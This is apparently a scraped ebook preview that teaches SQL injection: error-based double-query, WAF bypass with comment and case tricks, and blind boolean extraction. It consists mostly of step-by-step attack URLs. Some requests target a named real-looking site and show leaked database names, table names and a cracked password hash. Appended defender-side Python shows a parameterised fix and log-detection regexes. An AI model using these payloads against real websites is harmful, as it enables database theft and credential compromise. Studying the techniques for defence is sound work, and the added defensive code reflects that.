
Ultra hackers training kit for ethical hackers and cyber security professionals


Document information

Pages: 53
Size: 3.15 MB

Contents


... international conferences and national conferences, and more. His research was about securing IT: "The best way to hack is the best way to secure". ... about Anto by visiting his technical blog at http://anto2010.weebly.com


SQL Command

http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Now you will get a result like this:

As you can see the site is vulnerable and returned an error with the current database listed in the error, in this case "Vicitim_Database". Here we have used both floor() and rand() to query information_schema.tables, which are being nulled out in this request as floor(rand(0)*2) is null, which allows the rest of our request to be processed and return the current database name. The basic syntax will repeat itself, so you will pick it up over time if it does not catch on right away. Moving on, now that we know it is vulnerable we can test for additional databases, as well as version info and
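The request above only works because the site splices the id parameter straight into its SQL text. As an added, defender-side example (not part of the training kit), the Python below shows that vulnerable construction beside the validated, parameterised form, with sqlite3 standing in for MySQL; the news table, its rows, and the function names are constructed for the example.

```python
"""Vulnerable vs. hardened handling of an `id` request parameter.

Added example (not from the training kit). sqlite3 stands in for the
MySQL back end; the table and its rows are constructed.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the site's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list[str]:
    """BAD: the request parameter is spliced into the SQL text, so an
    appended condition such as 'AND 1=2' changes the query's logic and the
    page's response becomes an oracle for whatever the attacker appends."""
    sql = f"SELECT title FROM news WHERE id = {raw_id}"
    return [row[0] for row in conn.execute(sql)]


def parse_id(raw_id: str) -> int:
    """Accept only a short ASCII decimal integer; anything else is rejected up front
    (str.isdigit() would also accept Unicode digits, so an explicit pattern is used)."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a decimal integer")
    return int(raw_id)


def lookup_hardened(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Validated input, a bound parameter, and no database error text in the response."""
    try:
        news_id = parse_id(raw_id)
        rows = conn.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchall()
    except ValueError:
        return {"status": 400, "titles": []}
    except sqlite3.Error:
        # Log the exception server-side; the client only ever sees a generic status,
        # so no "Duplicate entry ..." or syntax-error text can leak query results.
        return {"status": 500, "titles": []}
    return {"status": 200, "titles": [row[0] for row in rows]}


if __name__ == "__main__":
    db = make_db()
    for probe in ("2", "2 AND 1=1", "2 AND 1=2", "2 OR 1=1"):
        print(f"{probe!r:14} vulnerable={lookup_vulnerable(db, probe)!r:30} "
              f"hardened={lookup_hardened(db, probe)}")
```

Run stand-alone, the vulnerable path returns a different row set for "2 AND 1=1" and "2 AND 1=2", which is exactly the TRUE/FALSE signal the rest of this tutorial relies on; the hardened path answers every non-numeric probe with a 400 and never forwards database error text to the client, which closes both the boolean and the error-message channels at once.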


Now that we have the count we can alter the above to use CONCAT and LIMIT to grab the name of each database available.

NOTE: You will need to keep incrementing the value of "N" in the middle of the above query to work your way through the available DB names; just keep going until you have reached the number returned in our request above this one (i.e. LIMIT 0,1 followed by LIMIT 1,1 followed by LIMIT 2,1, and just repeat as needed). We have to do this since we can't use GROUP_CONCAT.


Now you will get a result like this:

The message will appear the same, but LIMIT will be changed to get a different DB name each time.

Step 4

Once you have all the DB names you might want to find out the current user and confirm version info, as well as some other basic stuff. It can be done using slight variations of our original query for the current database, which would look like this; notice only the call in the middle is being altered.

SQL Command

Finding the version of the database


http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Now you will get a result like this:

... FROM(select count(*),concat((select (select concat(@@datadir)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Now you will get a result like this:

... FROM(select count(*),concat((select (select concat(@@hostname)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Now you will get a result like this:

NOTE: DATADIR & HOSTNAME might not always work, depending on version and DB setup.


Step 7

Find the number of tables

Alright, we have gathered the basic info so now it is time to move on to actually grabbing the table and column names.

As with other methods we will start with tables and then work to columns, and like the above examples we will be using CONCAT and LIMIT to allow us to get the entire contents since we cannot use GROUP_CONCAT(). We first get the count and then enumerate the tables.

Now you will get a result like this:


Now you will get a result like this:

You will need to HEX the DB name from which you are pulling table names, or it will not be properly processed; the same is true if you are pulling columns from tables, as we will do in this next step now that we have found some tables.


... FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Now you will get a result like this:

Once the number of columns is known we can just use LIMIT again to sort through them one by one; just keep incrementing LIMIT until you have found as many as it returned in the above request.


... table_schema=<HEX_VALUE_OF_DB_NAME> AND table_name=<HEX_VALUE_OF_TABLE_NAME> LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Now you will get a result like this:

OK, so now we have outlined the entire database structure and know the tables and columns. Now it is finally time to extract the desired data from the database.


... <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)

Now you will get a result like this:

If you need to continue you can do what we have done for every other request and start incrementing the LIMIT value to enumerate all of the data you want to pull. You have successfully extracted data using Double Query SQL Injection.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Step 3

Check the version of MySQL

http://www.techvision.co.uk/news.php?id=45+and+(select+1+from(select%0Acount(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

Now you can get the version of the database:

Duplicate entry '5.0.95-log1' for key 1


Step 4

Check the name of the database

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'techvision281009~1' for key 1


Step 5

Find the name of the table

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'users~1' for key 1

Next you must convert the name of the table to a hex value. Nowadays there are many tools available online for this conversion.


Step 6

Find the name of the column present in the table

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from ...


Step 7

Find the name of the column present in the table

Here I am changing the LIMIT to find another column:

... columns where table_name=0x7573657273 limit 2,1)

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from ...


Decrypt the value to get the password

9679ee7b0e7ddb35b34046a7c76e6e23 = l674300b

Note: only for learning purposes, do not use it for illegal operations


What is SQL injection bypassing a WAF?

WAF stands for Web Application Firewall. It is another type of SQL injection. Nowadays SQL comments are used for SQL injection; they allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attacker's commands while commenting out the actual legitimate query.

Some other comments in SQL


http://www.victim.com/index.php?id=777+ORDER+BY+1,2,3,4,5

No Errors

http://www.victim.com/index.php?id=777+ORDER+BY+1,2,3,4,5,6

Errors

http://www.victim.com/index.php?id=777+UNION+SELECT+1,2,3,4,5

http://www.victim.com/index.php?id=777+UNION+SELECT+1,2,3,4,5

403 Forbidden


http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,CONCAT(database(),user(),version()),3,4,5

403 Forbidden


OK, so now we have commented out our UNION SELECT statement but something is still setting off the filters. It is most likely the CONCAT statement. In some cases it is possible to bypass filters by simply changing the norm up and retesting.

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),user(),version()),3,4,5


http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA

403 Forbidden

Now you know what to do, so start by altering GROUP_CONCAT, same as we did for CONCAT.

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEM.SCHEMATA

No Errors

Now you can get a result like this:

Information_Schema

sampleDB

This should now show us the available databases; now let us check for the tables on the current database.


http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEM.TABLES+WHERE+TABLE_SCHEMA=DATABASE()

403 Forbidden again

In some cases you may have experienced a 403 in the previous step as well; it is due to the fact that often INFORMATION_SCHEMA or TABLES will be filtered. Again, this changes from site to site based on how it was configured, so it could even be other items, but these are the most common. In order to get around the filters we simply need to use our comments method again.

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.TABLES

No Errors

Now you can get a result like this:

Admin, Groups, Getalk, Users


Now we have all of the tables for the current database displayed on the page without any 403 holding us back. Convert the table name to a hex value:

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e

OK, now we know the tables and associated columns. It is time to get some data extracted.

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0x3a, pwd,0x3a,mailid,0x3a),3,4,5+FROM+Admin--


Now you will get id, mailid, pwd etc.

Some useful dorks

/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--

union select column from table


It is another type of SQL injection. In this chapter I show how attackers take advantage of SQL injection vulnerabilities by using time-based blind SQL injection with heavy queries.

http://www.victim.com/index.php?id=777 AND 1=1

No Errors

http://www.victim.com/index.php?id=777 AND 1=2

Errors on Page

So this is a good time to start enumerating some table names from the current database.

Here you will use TRUE/FALSE request statements and then analyze the errors or response generated to determine if we are on the right track, as we will need to start by guessing the table names. This may take some guessing and some time, which is why most people don't like this method, but it can pay off when nothing else will work, so just have some patience. It will work like this:

http://www.victim.com/index.php?id=777' and (SELECT 1 from passwords limit


Now you will be using the TRUE/FALSE results to determine what columns are present in the table. It will work like this:

http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1 +-'

You are now using SUBSTRING to query within a query and check for columns FROM our found table (admin).

http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,userid),1,1) from admin limit 0,1)=1 +-

No Errors

http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,login),1,1) from admin limit 0,1)=1 +-

Errors

http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,username),1,1) from admin limit 0,1)=1 +-

No Errors


http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,password),1,1) from admin limit 0,1)=1-

No Errors

Now you will change the limit to get different

Now that you have found the table name and associated column names we can actually extract some data. In order to extract you will change up our syntax slightly so that it takes advantage of the ASCII CHAR conversion. We will again analyze the results based on TRUE/FALSE responses. This part is very time consuming as we have to get each letter one at a time (in CHAR value) and then convert it over to get the standard plain text that most people can identify with.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65

TRUE: the first char of the password for admin with userid 1 is greater than 65, so we need to go higher with our next request until we hit an error.


http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>122

FALSE: error, indicating it is not a char greater than 122, which is good as that is what we would expect, so now we need to meet in the middle.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>100

TRUE: still need to continue moving higher.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>115

FALSE: getting warmer, but still need to reduce a little.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>112

TRUE: still need to continue moving higher.


http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>113

FALSE: indicating we have gone too far. WTF?

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>111

TRUE: indicating we need to move up.

As you can see this can take some time. In the example above we would use some reasoning and determine that the char value is greater than 111, but less than 113. When we ran the test against 112 it indicated as true, thus meaning it is greater than OR equal to 112. If we convert this we get the letter "p". OK, so we have the first letter; now let's adjust our LIMIT at the end to move on to the second character position. We will also do our best to use our brains to speed things up and start guessing the next logical character to follow a "p", like maybe an "a". It now looks like this:


http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>97

TRUE: indicating we need to move up.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>98

FALSE: indicating we have gone too far and that we were right with the guess of an "a", which is the char value for

OK so we have now found the first two letters of the password, which are "pa"; let's keep guessing.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>115

TRUE: indicating we need to move up.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>116

FALSE: indicating we have gone too far and that we were right on track with the guessing of an "s", which is the char value for 115.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>116
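The three techniques in this kit (the floor(rand(0)*2) ... GROUP BY double query, the /*!UNION*/ and mixed-case WAF bypasses, and the quote-plus-ascii(substring(...)) TRUE/FALSE probes above) each leave a characteristic trace in web-server access logs, and the hex-encoded table names from the earlier steps can be read straight back out of a request. As an added, defender-side example that is not from the training kit, the Python below normalises a request the way MySQL would read it (URL-decoding, unwrapping versioned comments, collapsing whitespace, lowercasing) before matching, so the case and comment tricks do not hide the keywords, and decodes 0x... literals so an analyst can see which table was targeted. The log lines, hosts, timestamps, tag names and regexes are all constructed and my own assumptions about what a SOC would flag, not any product's rule set.

```python
"""Access-log triage for the injection patterns shown in this tutorial.

Added example (not from the training kit). Hosts, timestamps and log lines
are constructed; tag names and regexes are my own, not a product's rule set.
"""
import re
from urllib.parse import unquote_plus

# MySQL executes the contents of "versioned" comments (/*!UNION*/, /*!50000UNION*/)
# while a naive filter sees only comment text, so unwrap them before matching.
_VERSIONED_COMMENT = re.compile(r"/\*!\s*(?:\d{5})?\s*(.*?)\*/", re.S)
# Ordinary comments (/**/) are used as whitespace in the "dork" style payloads.
_PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_HEX_LITERAL = re.compile(r"0x([0-9a-f]+)\b")
_REQUEST = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def normalize(raw_query: str) -> str:
    """URL-decode, unwrap comments, collapse whitespace and lowercase a query string."""
    q = unquote_plus(raw_query)                  # '+' and %XX become plain characters
    q = _VERSIONED_COMMENT.sub(r" \1 ", q)       # keep the keyword hidden inside /*! ... */
    q = _PLAIN_COMMENT.sub(" ", q)               # drop comments used as separators
    q = re.sub(r"\s+", " ", q).strip().lower()
    return re.sub(r"\s*\.\s*", ".", q)           # "/*!INFORMATION_SCHEMA*/ .TABLES" -> one token


# One signature per technique covered in the tutorial; all run on the normalized text.
SIGNATURES = {
    "error_based_double_query": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group by", re.S),
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "subquery_in_parameter": re.compile(r"\(\s*select\b"),
    "boolean_probe": re.compile(
        r"\b(?:and|or)\b\s*(?:\d+\s*=\s*\d+|\(?\s*(?:select\s+)?(?:ascii|substring)\s*\()"),
    "quote_break": re.compile(r"'\s*(?:and|or|union)\b"),
    "schema_enumeration": re.compile(r"information_schema\.(?:tables|columns|schemata)"),
}


def decode_hex_literals(normalized: str) -> list[str]:
    """Recover the table/column names an attacker passed as 0x... literals."""
    names = []
    for match in _HEX_LITERAL.finditer(normalized):
        digits = match.group(1)
        if len(digits) % 2:
            digits = "0" + digits
        names.append(bytes.fromhex(digits).decode("utf-8", errors="replace"))
    return names


def analyze_log_line(line: str) -> dict:
    """Return the tags, decoded hex literals and normalized query for one access-log line."""
    match = _REQUEST.search(line)
    if not match:
        return {"tags": [], "decoded_hex": [], "normalized": ""}
    query = match.group("target").partition("?")[2]
    norm = normalize(query)
    tags = sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))
    return {"tags": tags, "decoded_hex": decode_hex_literals(norm), "normalized": norm}


# Constructed sample lines (Apache combined format): a benign request, then one
# request for each technique in the tutorial, with the placeholder hosts removed.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Mar/2019:16:02:11 +0000] "GET /index.php?id=7 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [04/Mar/2019:16:02:12 +0000] "GET /index.php?id=7+and(select+1+FROM(select+count(*),'
    'concat((select+(select+concat(version()))+FROM+information_schema.tables+LIMIT+0,1),'
    'floor(rand(0)*2))x+FROM+information_schema.tables+GROUP+BY+x)a) HTTP/1.1" 500 231',
    '10.0.0.9 - - [04/Mar/2019:16:02:40 +0000] "GET /index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,'
    'GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEMA*/.COLUMNS+WHERE+'
    'TABLE_NAME=0x41646d696e HTTP/1.1" 200 5301',
    '10.0.0.9 - - [04/Mar/2019:16:03:05 +0000] "GET /index.php?id=777%27+and+(SELECT+substring('
    'concat(1,userid),1,1)+from+admin+limit+0,1)=1+--+ HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        result = analyze_log_line(line)
        print(result["tags"], result["decoded_hex"])
```

The normalisation step is the part worth copying into a real rule set: the author's GrOUp_COnCaT and /*!INFORMATION_SCHEM*/ tricks defeat a filter that matches the raw URL, but not one that decodes and unwraps the request first. The decoded hex literals (0x41646d696e is "Admin", 0x7573657273 is "users") tell an incident responder which tables were enumerated without re-running anything.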


Posted: 04/03/2019, 16:02
